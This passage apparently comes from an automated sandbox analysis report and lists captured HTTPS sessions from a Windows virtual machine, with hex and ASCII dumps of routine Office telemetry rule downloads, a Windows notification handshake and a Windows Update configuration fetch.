                                                                                                                                                                        2024-11-21 09:38:12 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        142192.168.2.64988613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:12 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:13 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                        x-ms-request-id: b82dd3a8-b01e-0053-0e8c-3acdf8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093813Z-178bfbc474bw8bwphC1NYC38b4000000012g000000009p4u
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        143192.168.2.64989740.113.110.67443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:13 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 55 41 42 76 58 38 39 48 36 30 57 4d 47 61 6d 4b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 35 30 36 37 31 61 66 39 39 37 65 31 37 36 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 304MS-CV: UABvX89H60WMGamK.1Context: b50671af997e176
                                                                                                                                                                        2024-11-21 09:38:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:38:13 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 55 41 42 76 58 38 39 48 36 30 57 4d 47 61 6d 4b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 35 30 36 37 31 61 66 39 39 37 65 31 37 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6f 4a 67 77 33 78 62 6a 73 61 31 2b 45 45 5a 34 43 58 6d 57 77 51 41 64 6a 45 56 34 6b 49 75 52 78 36 36 73 4d 52 6e 39 74 6d 58 46 31 73 70 4d 7a 31 33 6d 59 43 63 55 68 6e 57 5a 6f 41 5a 30 37 58 31 39 6f 75 44 71 2f 6d 71 63 38 69 4b 61 55 4d 31 67 55 34 7a 35 70 71 47 76 54 39 50 37 58 4d 58 43 53 4e 74 75 70 6d 72 53 76
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: UABvX89H60WMGamK.2Context: b50671af997e176<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXoJgw3xbjsa1+EEZ4CXmWwQAdjEV4kIuRx66sMRn9tmXF1spMz13mYCcUhnWZoAZ07X19ouDq/mqc8iKaUM1gU4z5pqGvT9P7XMXCSNtupmrSv
                                                                                                                                                                        2024-11-21 09:38:13 UTC73OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 35 0d 0a 4d 53 2d 43 56 3a 20 55 41 42 76 58 38 39 48 36 30 57 4d 47 61 6d 4b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 35 30 36 37 31 61 66 39 39 37 65 31 37 36 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: BND 3 CON\QOS 55MS-CV: UABvX89H60WMGamK.3Context: b50671af997e176
                                                                                                                                                                        2024-11-21 09:38:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:38:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6c 5a 75 2b 36 4b 32 48 6b 55 4f 78 75 35 6b 58 51 59 49 6e 70 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: lZu+6K2HkUOxu5kXQYInpw.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        144192.168.2.64989813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:13 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:14 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:13 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                                                                                        x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093813Z-178bfbc474bgvl54hC1NYCsfuw000000017000000000abck
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        145192.168.2.64990113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:14 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:14 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                        x-ms-request-id: 270c2d5d-601e-00ab-2f8c-3a66f4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093814Z-1777c6cb754mrj2shC1TEB6k7w0000000b20000000006e23
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        146192.168.2.64990213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:14 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:14 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1425
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                        x-ms-request-id: 95a88f05-701e-001e-7f87-3bf5e6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093814Z-r1d97b99577xdmfxhC1TEBqbhg00000001y000000000071h
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:14 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        147192.168.2.64990313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:14 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:14 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1388
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                        x-ms-request-id: 607d0db8-301e-0052-4363-3b65d6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093814Z-178bfbc474bbbqrhhC1NYCvw7400000001eg000000006es0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:14 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        148192.168.2.64990413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:15 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:15 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                        x-ms-request-id: d606dcfe-601e-003e-695e-3b3248000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093815Z-178bfbc474bbcwv4hC1NYCypys000000012g00000000a3at
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:15 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        149192.168.2.64991052.149.20.212443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:15 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cW5bTrG1rw+aTtT&MD=dl6frla3 HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                        2024-11-21 09:38:16 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Expires: -1
                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                        MS-CorrelationId: d7abe8d2-4819-402a-b3f9-68875f0acbcb
                                                                                                                                                                        MS-RequestId: 4669458b-afcc-4ded-8221-c86d6d1943f9
                                                                                                                                                                        MS-CV: u/yYpMh7IE2UiK42.0
                                                                                                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:15 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Content-Length: 30005
                                                                                                                                                                        2024-11-21 09:38:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                        2024-11-21 09:38:16 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
